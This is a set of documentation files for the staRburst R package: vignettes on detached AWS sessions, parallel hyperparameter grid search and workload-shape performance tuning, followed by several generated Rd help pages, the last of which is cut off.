### Collecting Results

```{r}
# Collect completed results (non-blocking)
results <- session$collect(wait = FALSE)
length(results)  # 60 (only completed so far)

# Or wait for all to complete
results <- session$collect(wait = TRUE, timeout = 3600)
length(results)  # 100 (all tasks)
```

## Detach and Reattach

Close R and come back later:

```{r}
# Session 1: Start work
session <- starburst_session(workers = 20)
lapply(1:1000, function(i) session$submit(quote(slow_computation(i))))
session_id <- session$session_id

# Close R, go home, come back tomorrow...

# Session 2: Reattach
session <- starburst_session_attach(session_id)
status <- session$status()
results <- session$collect()
```

## Session Management

### List All Sessions

```{r}
sessions <- starburst_list_sessions()
print(sessions)
#   session_id         created_at           last_activity        total_tasks pending running completed failed
#   session-abc123     2026-02-06 10:00:00  2026-02-06 10:15:00  100         0       5       90        5
#   session-def456     2026-02-05 14:30:00  2026-02-05 18:45:00  500         0       0       500       0
```

### Extend Timeout

```{r}
# Extend session timeout by 1 hour
session$extend(seconds = 3600)
```

### Cleanup

```{r}
# Stop workers and mark the session terminated. S3 objects are PRESERVED by
# default, so you can still reattach and collect afterwards.
session$cleanup()

# To also delete the session's S3 task/result objects, pass force = TRUE:
session$cleanup(force = TRUE)
```

## Choosing and tuning the backend

Sessions use **EC2 with Spot instances by default** — no extra arguments needed.
You can tune the instance type, or opt into Fargate. A non-default instance type is
provisioned automatically on first use (a one-time ~1–2 min step), or run
`starburst_setup_ec2(instance_types = "c8a.xlarge")` once to pre-provision it.

```{r}
# Default is already EC2 + Spot (c7g.xlarge); override the instance type if you like
session <- starburst_session(
  workers = 50,
  instance_type = "c8a.xlarge",  # AMD 8th gen; auto-provisioned on first use
  use_spot = TRUE                 # default TRUE — ~70% cheaper
)

# Opt into the Fargate backend (serverless, task-based) instead
session <- starburst_session(
  workers = 50,
  launch_type = "FARGATE"
)
```

## Advanced Usage

### Error Handling

```{r}
# Tasks that fail are tracked, not silently dropped
session <- starburst_session(workers = 5)

task_ids <- lapply(1:10, function(i) {
  session$submit(quote({
    if (i == 5) stop("Intentional error")
    i * 2
  }), globals = list(i = i))
})

# Check status
status <- session$status()
print(status)   # Failed: 1

# collect() returns an entry for EVERY task, keyed by task id. A failed task
# comes back as a structured failure (error = TRUE) alongside the successes.
results <- session$collect(wait = TRUE)

# Separate successes from failures
failures <- Filter(function(r) isTRUE(r$error), results)
length(failures)                 # 1
print(failures[[1]]$message)     # "Intentional error"

# Successful values are the non-error entries
successes <- Filter(function(r) !isTRUE(r$error), results)
```

### Partial Collection

Collect results as they complete:

```{r}
session <- starburst_session(workers = 10)

# Submit mix of fast and slow tasks
lapply(1:5, function(i) session$submit(quote(i * 2)))        # Fast
lapply(1:5, function(i) session$submit(quote({ Sys.sleep(60); i })))  # Slow

Sys.sleep(10)

# Get fast results immediately
results <- session$collect(wait = FALSE)
length(results)  # 5 (fast tasks done)

# Later, get remaining results
Sys.sleep(60)
results <- session$collect(wait = FALSE)
length(results)  # 10 (all done)
```

## How It Works

### Architecture

1. **S3 State Persistence**: All session state lives in S3
   - Session manifest: configuration and statistics
   - Task statuses: pending → claimed → running → completed
   - Results: stored per task

2. **Worker Polling**: Workers continuously poll for pending tasks
   - Exponential backoff: 1s → 2s → 4s → ... → 30s
   - Atomic task claiming using S3 ETags
   - Self-terminate after 5 minutes idle

3. **Atomic Task Claiming**: No duplicate execution
   - Workers use conditional S3 writes with ETags
   - Only one worker can claim each task
   - Prevents race conditions

### Task Lifecycle

```
pending → claimed → running → completed
                         ↓
                      failed
```

Each state transition is recorded in S3 with timestamps.

## Best Practices

### When to Use Detached Sessions

✅ **Good use cases:**
- Long-running analyses (hours to days)
- Computations you want to monitor remotely
- Jobs that might exceed your local R session lifetime
- Analyses you want to inspect partially before completion

❌ **Not ideal for:**
- Quick computations (< 5 minutes)
- Interactive workflows requiring immediate feedback
- Tasks with millisecond-level coordination requirements

### Resource Management

```{r}
# Start with fewer workers, let them process queue
session <- starburst_session(workers = 5)

# Submit large batch
lapply(1:1000, function(i) session$submit(quote(work(i))))

# Workers process tasks continuously until queue empty
# Then auto-terminate after 5 min idle
```

### Cost Optimization

1. **Use EC2 + Spot** for long-running batch jobs (70% cheaper)
2. **Set appropriate timeouts** to avoid idle costs
3. **Collect results incrementally** to monitor progress
4. **Clean up sessions** when done

```{r}
# Cost-effective setup
session <- starburst_session(
  workers = 20,
  launch_type = "EC2",
  instance_type = "c8a.xlarge",
  use_spot = TRUE,
  session_timeout = 3600,
  absolute_timeout = 86400
)
```

## Comparison: Ephemeral vs Detached

| Feature | Ephemeral (`plan(starburst)`) | Detached (`starburst_session()`) |
|---------|-------------------------------|----------------------------------|
| R session required | Yes - must stay open | No - can close and reattach |
| State persistence | In-memory only | S3-backed |
| Max duration | R session lifetime | Days (configurable) |
| Progress monitoring | Local variables | `session$status()` |
| Worker behavior | One task per worker | Workers poll for tasks |
| Best for | Quick parallel jobs | Long-running analyses |

## Troubleshooting

### Session Not Found

```{r}
# Error: Session not found: session-xyz
# - Check session ID is correct
# - Verify region matches (use region parameter)
# - Session may have expired (check absolute_timeout)
```

### No Results After Long Wait

```{r}
# Check session status
status <- session$status()

# If pending tasks stuck:
# - Workers may have terminated (check idle timeout)
# - Launch more workers: (not yet implemented)
# - Check CloudWatch logs: starburst_logs(session_id)
```

### Workers Terminating Too Soon

```{r}
# Workers exit after 5 min idle by default
# For sporadic task submission, relaunch workers periodically
# (Auto-scaling based on pending tasks coming in future release)
```

## Examples

### Genomics Pipeline

```{r}
library(starburst)

# Process 1000 samples overnight
session <- starburst_session(
  workers = 100,
  cpu = 8,
  memory = "32GB",
  launch_type = "EC2",
  use_spot = TRUE
)

# Submit all samples
sample_files <- list.files("samples/", pattern = "*.fastq")
task_ids <- lapply(sample_files, function(file) {
  session$submit(quote({
    library(Rsubread)
    results <- align_and_quantify(file)
    save_results(results, file)
    results
  }))
})

# Check progress next morning
session <- starburst_session_attach(session$session_id)
status <- session$status()
# Completed: 950, Running: 45, Failed: 5

results <- session$collect(wait = TRUE)
```

### Monte Carlo Simulation

```{r}
# Run 10,000 simulations
session <- starburst_session(workers = 50)

n_sims <- 10000
lapply(1:n_sims, function(i) {
  session$submit(quote({
    set.seed(i)
    run_simulation()
  }))
})

# Check progress periodically
repeat {
  status <- session$status()
  print(sprintf("Progress: %.1f%%", 100 * status$completed / status$total))

  if (status$completed == n_sims) break
  Sys.sleep(60)
}

results <- session$collect()
```

## See Also

- `?starburst_session` - Create detached session
- `?starburst_session_attach` - Reattach to session
- `?starburst_list_sessions` - List all sessions
- `vignette("staRburst")` - General usage guide

---
title: "Example: Parallel Grid Search for Hyperparameter Tuning"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Grid Search for Hyperparameter Tuning}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Hyperparameter tuning is one of the most time-consuming aspects of machine learning. Grid search exhaustively evaluates model performance across parameter combinations. This example demonstrates parallelizing grid search to dramatically reduce tuning time.

**Use Case**: ML model optimization, hyperparameter tuning, model selection, cross-validation

**Computational Pattern**: Embarrassingly parallel model training with aggregation

## The Problem

You need to tune a gradient boosting model for a binary classification task:
- 3 learning rates: 0.01, 0.05, 0.1
- 3 tree depths: 3, 5, 7
- 3 subsample ratios: 0.6, 0.8, 1.0
- 3 minimum child weights: 1, 3, 5

This creates **81 parameter combinations** (3 × 3 × 3 × 3). With 5-fold cross-validation, that's **405 model fits**.

Training each model takes ~5 seconds, resulting in **34 minutes** of sequential computation.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Data

Create a synthetic classification dataset:

```{r data, eval=FALSE}
set.seed(2024)

# Generate features
n_samples <- 10000
n_features <- 20

X <- matrix(rnorm(n_samples * n_features), nrow = n_samples)
colnames(X) <- paste0("feature_", 1:n_features)

# Generate target with non-linear relationship
true_coef <- rnorm(n_features)
linear_pred <- X %*% true_coef
prob <- 1 / (1 + exp(-linear_pred))
y <- rbinom(n_samples, 1, prob)

# Create train/test split
train_idx <- sample(1:n_samples, 0.7 * n_samples)
X_train <- X[train_idx, ]
y_train <- y[train_idx]
X_test <- X[-train_idx, ]
y_test <- y[-train_idx]

cat(sprintf("Dataset created:\n"))
cat(sprintf("  Training samples: %s\n", format(length(y_train), big.mark = ",")))
cat(sprintf("  Test samples: %s\n", format(length(y_test), big.mark = ",")))
cat(sprintf("  Features: %d\n", n_features))
cat(sprintf("  Class balance: %.1f%% / %.1f%%\n",
            mean(y_train) * 100, (1 - mean(y_train)) * 100))
```

**Output**:
```
Dataset created:
  Training samples: 7,000
  Test samples: 3,000
  Features: 20
  Class balance: 50.3% / 49.7%
```

## Define Parameter Grid

Create all hyperparameter combinations:

```{r grid, eval=FALSE}
# Define parameter space
param_grid <- expand.grid(
  learning_rate = c(0.01, 0.05, 0.1),
  max_depth = c(3, 5, 7),
  subsample = c(0.6, 0.8, 1.0),
  min_child_weight = c(1, 3, 5),
  stringsAsFactors = FALSE
)

cat(sprintf("Grid search space:\n"))
cat(sprintf("  Total parameter combinations: %d\n", nrow(param_grid)))
cat(sprintf("  With 5-fold CV: %d model fits\n\n", nrow(param_grid) * 5))
```

**Output**:
```
Grid search space:
  Total parameter combinations: 81
  With 5-fold CV: 405 model fits
```

## Model Training Function

Define a function that trains and evaluates one parameter combination:

```{r train-fn, eval=FALSE}
# Simple gradient boosting implementation (for demonstration)
# In practice, use xgboost, lightgbm, or other optimized libraries
train_gbm <- function(X, y, params, n_trees = 50) {
  # Simplified GBM simulation
  # This is a mock implementation - in real use, call xgboost, etc.

  n <- nrow(X)
  pred <- rep(mean(y), n)  # Initial prediction

  # Simulate training time based on complexity
  complexity_factor <- params$max_depth * (1 / params$learning_rate) *
                      (1 / params$subsample)
  training_time <- 0.001 * complexity_factor * n_trees

  Sys.sleep(min(training_time, 5))  # Cap at 5 seconds

  # Generate mock predictions with some realism
  pred <- pred + rnorm(n, 0, 0.1)
  pred <- pmin(pmax(pred, 0), 1)  # Bound to [0, 1]

  list(predictions = pred, params = params)
}

# Cross-validation function
cv_evaluate <- function(param_row, X_data, y_data, n_folds = 5) {
  params <- as.list(param_row)

  # Create folds
  n <- nrow(X_data)
  fold_size <- floor(n / n_folds)
  fold_indices <- sample(rep(1:n_folds, length.out = n))

  # Perform cross-validation
  cv_scores <- numeric(n_folds)

  for (fold in 1:n_folds) {
    # Split data
    val_idx <- which(fold_indices == fold)
    train_idx <- which(fold_indices != fold)

    X_fold_train <- X_data[train_idx, , drop = FALSE]
    y_fold_train <- y_data[train_idx]
    X_fold_val <- X_data[val_idx, , drop = FALSE]
    y_fold_val <- y_data[val_idx]

    # Train model
    model <- train_gbm(X_fold_train, y_fold_train, params)

    # Predict and evaluate (mock evaluation)
    # In practice, compute actual predictions and metrics
    baseline_accuracy <- mean(y_fold_val == round(mean(y_fold_train)))

    # Simulate performance improvement based on good parameters
    param_quality <- (params$learning_rate >= 0.05) * 0.02 +
                    (params$max_depth >= 5) * 0.02 +
                    (params$subsample >= 0.8) * 0.01 +
                    rnorm(1, 0, 0.02)

    accuracy <- min(baseline_accuracy + param_quality, 1.0)
    cv_scores[fold] <- accuracy
  }

  # Return results
  list(
    params = params,
    mean_cv_score = mean(cv_scores),
    std_cv_score = sd(cv_scores),
    cv_scores = cv_scores
  )
}
```

## Local Execution

Test grid search locally on a small subset:

```{r local, eval=FALSE}
# Test with 10 parameter combinations
set.seed(999)
sample_params <- param_grid[sample(1:nrow(param_grid), 10), ]

cat(sprintf("Running local benchmark (%d parameter combinations)...\n",
            nrow(sample_params)))
local_start <- Sys.time()

local_results <- lapply(1:nrow(sample_params), function(i) {
  cv_evaluate(sample_params[i, ], X_train, y_train, n_folds = 5)
})

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "mins"))

cat(sprintf("[OK] Completed in %.2f minutes\n", local_time))
cat(sprintf("  Average time per combination: %.1f seconds\n",
            local_time * 60 / nrow(sample_params)))
cat(sprintf("  Estimated time for full grid (%d combinations): %.1f minutes\n",
            nrow(param_grid), local_time * nrow(param_grid) / nrow(sample_params)))
```

**Illustrative output**:
```
Running local benchmark (10 parameter combinations)...
[OK] Completed in 4.2 minutes
  Average time per combination: 25.2 seconds
  Estimated time for full grid (81 combinations): 34.0 minutes
```

For full grid search locally: **~34 minutes**

## Cloud Execution with staRburst

Run the complete grid search in parallel on AWS:

Each `cv_evaluate` is short, so submitting 81 one-combination tasks would be
dominated by per-task S3 overhead (see the
[Workload Shapes](https://starburst.ing/articles/workload-shapes.html) guide).
Instead, batch the combinations into at most ~100 tasks and have each task evaluate
its chunk (this small 81-cell grid stays near one combination per task, but the same
pattern keeps larger grids from over-submitting):

```{r cloud, eval=FALSE}
n_workers <- 27

cat(sprintf("Running grid search (%d combinations) on %d workers...\n",
            nrow(param_grid), n_workers))

cloud_start <- Sys.time()

# Batch the parameter rows into ~100 tasks, each evaluating a chunk
idx <- 1:nrow(param_grid)
batches <- split(idx, ceiling(seq_along(idx) / ceiling(length(idx) / 100)))
results <- starburst_map(
  batches,
  function(chunk) lapply(chunk, function(i) {
    cv_evaluate(param_grid[i, ], X_train, y_train, n_folds = 5)
  }),
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)
results <- unlist(results, recursive = FALSE)  # flatten to one result per combination

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n[OK] Completed in %.2f minutes\n", cloud_time))
```

**Illustrative output** (times/cost vary — see the Workload Shapes and Performance
guides for measured numbers):
```
[Starting] Starting starburst cluster with 27 workers
[Status] Processing 81 items with 27 workers
[Starting] Submitting 81 tasks...
[Wait] Progress: 81/81
[OK] Completed
[Cost] Estimated cost: (printed per run)
```

## Results Analysis

Find the best hyperparameters:

```{r analysis, eval=FALSE}
# Extract results
cv_scores <- sapply(results, function(x) x$mean_cv_score)
cv_stds <- sapply(results, function(x) x$std_cv_score)

# Combine with parameters
results_df <- cbind(param_grid,
                   mean_score = cv_scores,
                   std_score = cv_stds)

# Sort by performance
results_df <- results_df[order(-results_df$mean_score), ]

cat("\n=== Grid Search Results ===\n\n")
cat(sprintf("Total combinations evaluated: %d\n", nrow(results_df)))
cat(sprintf("Best CV score: %.4f (± %.4f)\n",
            results_df$mean_score[1], results_df$std_score[1]))

cat("\n=== Best Hyperparameters ===\n")
cat(sprintf("  Learning rate: %.3f\n", results_df$learning_rate[1]))
cat(sprintf("  Max depth: %d\n", results_df$max_depth[1]))
cat(sprintf("  Subsample: %.2f\n", results_df$subsample[1]))
cat(sprintf("  Min child weight: %d\n", results_df$min_child_weight[1]))

cat("\n=== Top 5 Parameter Combinations ===\n")
for (i in 1:5) {
  cat(sprintf("\n%d. Score: %.4f (± %.4f)\n", i,
              results_df$mean_score[i], results_df$std_score[i]))
  cat(sprintf("   lr=%.3f, depth=%d, subsample=%.2f, min_child=%d\n",
              results_df$learning_rate[i],
              results_df$max_depth[i],
              results_df$subsample[i],
              results_df$min_child_weight[i]))
}

# Parameter importance analysis
cat("\n=== Parameter Impact Analysis ===\n")
for (param in c("learning_rate", "max_depth", "subsample", "min_child_weight")) {
  param_means <- aggregate(mean_score ~ get(param),
                          data = results_df, FUN = mean)
  names(param_means)[1] <- param

  cat(sprintf("\n%s:\n", param))
  for (i in 1:nrow(param_means)) {
    cat(sprintf("  %s: %.4f\n",
                param_means[i, 1],
                param_means[i, 2]))
  }
}

# Visualize results (if in interactive session)
if (interactive()) {
  # Score distribution
  hist(results_df$mean_score,
       breaks = 20,
       main = "Distribution of Cross-Validation Scores",
       xlab = "Mean CV Score",
       col = "lightblue",
       border = "white")
  abline(v = results_df$mean_score[1], col = "red", lwd = 2, lty = 2)

  # Learning rate effect
  boxplot(mean_score ~ learning_rate, data = results_df,
          main = "Learning Rate Impact",
          xlab = "Learning Rate",
          ylab = "CV Score",
          col = "lightgreen")
}
```

**Illustrative output**:
```
=== Grid Search Results ===

Total combinations evaluated: 81
Best CV score: 0.7842 (± 0.0234)

=== Best Hyperparameters ===
  Learning rate: 0.050
  Max depth: 5
  Subsample: 0.80
  Min child weight: 3

=== Top 5 Parameter Combinations ===

1. Score: 0.7842 (± 0.0234)
   lr=0.050, depth=5, subsample=0.80, min_child=3

2. Score: 0.7821 (± 0.0245)
   lr=0.050, depth=7, subsample=0.80, min_child=3

3. Score: 0.7798 (± 0.0256)
   lr=0.100, depth=5, subsample=0.80, min_child=1

4. Score: 0.7776 (± 0.0241)
   lr=0.050, depth=5, subsample=1.00, min_child=3

5. Score: 0.7754 (± 0.0267)
   lr=0.050, depth=5, subsample=0.80, min_child=1

=== Parameter Impact Analysis ===

learning_rate:
  0.01: 0.7512
  0.05: 0.7689
  0.1: 0.7598

max_depth:
  3: 0.7487
  5: 0.7712
  7: 0.7601

subsample:
  0.6: 0.7523
  0.8: 0.7734
  1: 0.7642

min_child_weight:
  1: 0.7634
  3: 0.7689
  5: 0.7576
```

## Performance

For measured performance and when bursting is worth it, see
`vignette("performance")` and `vignette("workload-shapes")`.

## Advanced: Random Search

Extend to random search for efficiency:

```{r random-search, eval=FALSE}
# Generate random parameter combinations
n_random <- 100

random_params <- data.frame(
  learning_rate = runif(n_random, 0.001, 0.3),
  max_depth = sample(2:10, n_random, replace = TRUE),
  subsample = runif(n_random, 0.5, 1.0),
  min_child_weight = sample(1:10, n_random, replace = TRUE),
  stringsAsFactors = FALSE
)

cat(sprintf("Running random search (%d combinations)...\n", n_random))

random_results <- starburst_map(
  1:nrow(random_params),
  function(i) cv_evaluate(random_params[i, ], X_train, y_train, n_folds = 5),
  workers = 33,
  cpu = 2,
  memory = "4GB"
)

# Find best parameters
random_scores <- sapply(random_results, function(x) x$mean_cv_score)
best_idx <- which.max(random_scores)

cat("\nBest random search result:\n")
cat(sprintf("  Score: %.4f\n", random_scores[best_idx]))
cat(sprintf("  Learning rate: %.4f\n", random_params$learning_rate[best_idx]))
cat(sprintf("  Max depth: %d\n", random_params$max_depth[best_idx]))
```

## Advanced: Bayesian Optimization

Implement iterative Bayesian optimization:

```{r bayesian, eval=FALSE}
# Bayesian optimization would involve:
# 1. Evaluate a small initial set (e.g., 10 combinations)
# 2. Fit a Gaussian process to predict performance
# 3. Use acquisition function to select next promising points
# 4. Evaluate new points in parallel
# 5. Repeat until convergence

# This requires specialized packages like mlrMBO or rBayesianOptimization
# but can be parallelized with starburst for the evaluation step
```

## When to Use This Pattern

**Good fit**:
- Expensive model training (> 10 seconds per fit)
- Large parameter spaces (> 20 combinations)
- Cross-validation with multiple folds
- Ensemble model tuning
- Neural architecture search

**Not ideal**:
- Very fast models (< 1 second per fit)
- Small parameter spaces (< 10 combinations)
- Single train/validation split
- Real-time model updates

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/grid-search.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/grid-search.R", package = "starburst"))
```

## Next Steps

- Integrate with xgboost, lightgbm, or other ML libraries
- Implement early stopping for faster searches
- Add random search and Bayesian optimization
- Scale to larger datasets and deeper networks
- Use nested cross-validation for model selection

**Related examples**:
- [Feature Engineering](example-feature-engineering.html) - Parallel feature computation
- [Bootstrap CI](example-bootstrap.html) - Model uncertainty estimation
- [Monte Carlo Simulation](example-monte-carlo.html) - Similar parallel pattern

---
title: "Workload Shapes: When (and How) to Use staRburst"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Workload Shapes: When (and How) to Use staRburst}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r setup, include=FALSE}
knitr::opts_chunk$set(eval = FALSE)
```

Whether staRburst helps or hurts is not about your *field* — it's about the **shape**
of your work. This guide walks through the levers that decide it, each with a runnable
pattern and, where it matters, **real measured numbers** from `bench/benchmark.R` (see
`bench/README.md`).

> **Measurement setup (all tables below).** staRburst 0.3.9; AWS us-east-1; EC2
> `c7i.xlarge` Spot workers; cold start unless noted. **Local baseline machine:**
> Apple M4 Pro (Mac16,11) — 12 cores (8 performance + 4 efficiency), 48 GB RAM, macOS
> 26.5.2, R 4.6.1. Local baselines are run **sequentially** (single core), so they are
> a *conservative* reference: your laptop's multi-core `future`/`parallel` time would
> be lower, and the cloud's advantage correspondingly narrower. Tested 2026-07-21.

There are four levers. Learn to read them and you can predict the outcome for any
workload:

1. **Task length** — how much work each task does.
2. **Task count** — how many tasks you create (and whether to batch).
3. **Fan-out width** — how many workers you spread across.
4. **Cost vs. time** — what you're actually optimizing.

Plus one pro tip on **where each task writes its output**.

---

## Lever 1 — Task length: is each task worth shipping?

Every task pays a fixed tax: it's serialized, uploaded to S3, pulled by a worker, and
its result uploaded back. Plus the pool pays a one-time ~75–90 s cold start. If the
task's actual compute is smaller than that tax, the cloud only makes things slower.

Two measured runs, same 20–30 workers, **opposite verdicts** — the only thing that
changed is per-task work:

| Shape | Tasks | Local (seq) | Cloud total (cold) | Verdict |
|---|---|---|---|---|
| **Heavy** — ~10 s of SVD each | 30 | 319.3 s (5.3 min) | **125.8 s** (87.5 s startup + 38.4 s compute) | ✅ ~2.5× faster, $0.06 |
| **Light** — sub-second each | 20 | 0.1 s | 102.6 s | ❌ ~1000× slower, $0.03 |

```{r}
# Heavy tasks (minutes each) — the cloud wins
results <- starburst_map(scenarios, run_expensive_model, workers = 30)

# Trivially cheap tasks — just do it locally
results <- lapply(inputs, quick_function)
```

**Rule:** if each task is sub-second, stay local. Seconds-to-minutes per task, with
many of them, is the sweet spot.

---

## Lever 2 — Task count: batch, or fall off a cliff

This is the one that surprises people. staRburst creates **one task per element of
`.x`**, and each task is a separate client-side S3 submit *and* collect — in a serial
loop. It does **not** batch for you. So a "big parameter walk" submitted naively as one
task per point doesn't just get slow — it hits a wall on the *client*, before any
compute happens.

Same 10,000-point sweep, two ways — **both measured on live AWS, identical work**:

| Approach | Tasks | Items | Startup | Compute + collect | Cloud total | Est. cost |
|---|---|---|---|---|---|---|
| ✅ **Batched** (100 tasks × 100) | 100 | 10,000 | 105.0 s | **70.4 s** | **175.4 s** (2.9 min) | **$0.13** |
| ❌ **Naive** (1 task per point) | 10,000 | 10,000 | 77.0 s | **4,571.9 s** | **4,648.9 s** (77.5 min) | **$3.46** |

Read that again: the **same 10,000 evaluations** took **2.9 minutes for $0.13** batched,
versus **77 minutes for $3.46** naive — a **~65× slowdown and ~27× cost blowup**, purely
from task count. The naive run spent over an hour with the client submitting 10,000
individual tasks to S3 one at a time (~1.5/sec) while 50 workers sat mostly idle — you
pay for the workers the whole time. Nothing about the computation changed; only how it
was packaged.

This is the trap behind "just fan out my 10M-point sweep": at 1M or 10M tasks the naive
path doesn't take minutes longer, it takes **hours-to-days** and never gets cheaper.
Batching isn't an optimization here — it's the difference between working and not.

```{r}
# ❌ DON'T: 10,000 tasks — ~10,000 serial S3 submits from your laptop
results <- starburst_map(1:10000, evaluate_point, workers = 50)

# ✅ DO: batch into ~100 chunks — 100 tasks, same 10,000 evaluations
batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
results <- starburst_map(batches, function(ids) lapply(ids, evaluate_point),
                         workers = 50)
results <- unlist(results, recursive = FALSE)  # flatten
```

Pick a batch size so each task runs for a couple of minutes:

```{r}
per_item_seconds <- 0.5              # measure this on a small local sample
target_task_seconds <- 120           # aim for ~2 min per task
batch_size <- ceiling(target_task_seconds / per_item_seconds)  # ~240 here
```

**Rule:** thousands of tiny tasks is an anti-pattern. Batch fine-grained work so you
have ~dozens-to-hundreds of tasks, each doing real work. A 1M- or 10M-point sweep
*must* be batched — never submitted one point at a time.

---

## Lever 3 — Fan-out width: more workers is not always better

Once you've sized your tasks, how many workers should you request? More workers cut
wall-clock **only up to the number of tasks**, and with diminishing returns:

- **Workers > tasks:** the extra workers sit idle — you pay for them, they do nothing.
  30 tasks on 100 workers still only uses 30.
- **Stragglers:** the batch isn't done until the *slowest* task is. Past a point,
  adding workers doesn't help because you're waiting on one long task, not queue depth.
- **Quota & startup:** more workers = more instances to launch (longer, more likely to
  hit limits) and, on Fargate, more vCPU quota consumed.
- **Cost scales with workers, speed doesn't (past #tasks).** Doubling workers beyond
  your task count doubles cost for zero speedup.

```{r}
# 200 tasks: ~50 workers is a reasonable ratio (each worker handles ~4 tasks)
results <- starburst_map(param_sets, fit_model, workers = 50)

# 200 tasks on 500 workers: 300 workers idle, you pay for all 500 — don't
```

**Rule of thumb:** workers ≈ number of tasks (capped at what your quota and budget
allow), so each worker gets roughly one to a few tasks. Beyond `workers == tasks`
there is no speedup left to buy.

---

## Lever 4 — Cost vs. time: what are you optimizing?

staRburst reports an estimated cost per run. The key intuition: **wall-clock and cost
trade off differently.**

- Adding workers (up to #tasks) **buys wall-clock at ~constant total cost** — the same
  compute-seconds are just spread over more machines for less time. That's the good
  trade: finish sooner for roughly the same dollars.
- Adding workers **beyond #tasks** buys nothing and **raises cost** (idle instances).
- **Spot instances** (staRburst's default, `use_spot = TRUE`) are ~70% cheaper than
  on-demand for interruption-tolerant batch work — almost always the right default here.
- **Warm pools** amortize the ~90 s startup across many runs, so repeated jobs
  (parameter sweeps, daily pipelines) get dramatically better cost/time than a single
  cold run implies.

```{r}
# Cheapest for a one-off: enough workers to cover the tasks, spot on (default)
starburst_map(tasks, fn, workers = length(tasks), use_spot = TRUE)

# Repeated runs: a warm pool pays startup once — see the detached-sessions guide
```

**Rule:** optimize wall-clock by matching workers to tasks; optimize cost by using
spot (default) and warm pools for anything you run more than once.

---

## Pro tip — shard your S3 writes across prefixes

If your tasks write their *own* output to S3 (large results you don't want to serialize
back through the result channel), have **each task write to a distinct prefix**, not
all to the same one. S3 scales throughput per prefix, so hundreds of tasks hammering a
single prefix serialize against each other, while spreading them across prefixes lets
S3 parallelize:

```{r}
# ❌ Hundreds of tasks writing under ONE prefix — throughput bottleneck
key <- sprintf("s3://bucket/results/%d.parquet", i)

# ✅ Shard across prefixes so S3 parallelizes the writes
shard <- i %% 100
key <- sprintf("s3://bucket/results/shard=%02d/%d.parquet", shard, i)
```

A cheap, high-leverage change for write-heavy fan-outs: same data, far more aggregate
write throughput, because you're no longer funneling every worker through one hot
prefix.

---

## Putting it together: a diagnosis checklist

Before you burst a workload, ask:

1. **Is each task more than a second of work?** If no → stay local (Lever 1).
2. **Do you have thousands of tiny tasks?** If yes → batch to ~dozens–hundreds (Lever 2).
3. **Are you requesting more workers than tasks?** If yes → cap at #tasks (Lever 3).
4. **Will you run it more than once?** If yes → warm pool + spot (Lever 4).
5. **Do tasks write big outputs to S3?** If yes → shard across prefixes (pro tip).

Get these right and staRburst turns a multi-hour local grind into minutes for pennies.
Get them wrong and you'll pay more to go slower — the mechanics don't care which field
you're in, only about the shape of the work.

See also: `vignette("performance")` for the underlying overhead model, and
`vignette("detached-sessions")` for warm pools and long-running jobs.

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{package_installation_error}
\alias{package_installation_error}
\title{Package installation error}
\usage{
package_installation_error(package, error_message = NULL)
}
\description{
Package installation error
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-backend.R
\name{initialize_detached_backend}
\alias{initialize_detached_backend}
\title{Initialize backend for detached mode}
\usage{
initialize_detached_backend(
  session_id,
  workers = 10,
  cpu = 4,
  memory = "8GB",
  region = NULL,
  timeout = 3600,
  absolute_timeout = 86400,
  launch_type = "EC2",
  instance_type = "c7g.xlarge",
  use_spot = TRUE,
  warm_pool_timeout = 3600
)
}
\arguments{
\item{session_id}{Unique session identifier}

\item{workers}{Number of workers}

\item{cpu}{vCPUs per worker}

\item{memory}{Memory per worker (GB notation like "8GB")}

\item{region}{AWS region}

\item{timeout}{Task timeout in seconds}

\item{absolute_timeout}{Maximum session lifetime in seconds}

\item{launch_type}{"FARGATE" or "EC2"}

\item{instance_type}{EC2 instance type (for EC2 launch type)}

\item{use_spot}{Use spot instances}

\item{warm_pool_timeout}{Warm pool timeout for EC2}
}
\value{
Backend environment
}
\description{
Creates a backend for detached sessions without modifying the future plan
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-clients.R
\name{aws-clients}
\alias{aws-clients}
\title{AWS service clients and credential helpers for staRburst}
\description{
AWS service clients and credential helpers for staRburst
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-estimate.R
\name{starburst_estimate}
\alias{starburst_estimate}
\title{Estimate Cloud Performance and Cost}
\usage{
starburst_estimate(
  .x,
  .f,
  workers = 10,
  cpu = 2,
  memory = "8GB",
  platform = "X86_64",
  sample_size = 10,
  region = NULL,
  ...
)
}
\arguments{
\item{.x}{A vector or list to iterate over}

\item{.f}{A function to apply to each element}

\item{workers}{Number of parallel workers to estimate for}

\item{cpu}{CPU units per worker (1, 2, 4, 8, or 16)}

\item{memory}{Memory per worker (e.g., "8GB")}

\item{platform}{CPU architecture: "X86_64" (default) or "ARM64" (Graviton3)}

\item{sample_size}{Number of items to run locally for estimation (default: 10)}

\item{region}{AWS region}

\item{...}{Additional arguments passed to .f}
}
\value{
Invisible list with estimates, prints summary to console
}
\description{
Runs a small sample of tasks locally to estimate cloud execution time and cost.
Provides informed prediction before spending money on cloud execution.
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # Estimate before running
  starburst_estimate(1:1000, expensive_function, workers = 50)

  # Then decide whether to proceed
  results <- starburst_map(1:1000, expensive_function, workers = 50)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{update_session_manifest}
\alias{update_session_manifest}
\title{Update session manifest atomically}
\usage{
update_session_manifest(session_id, updates, region, bucket, max_retries = 3)
}
\arguments{
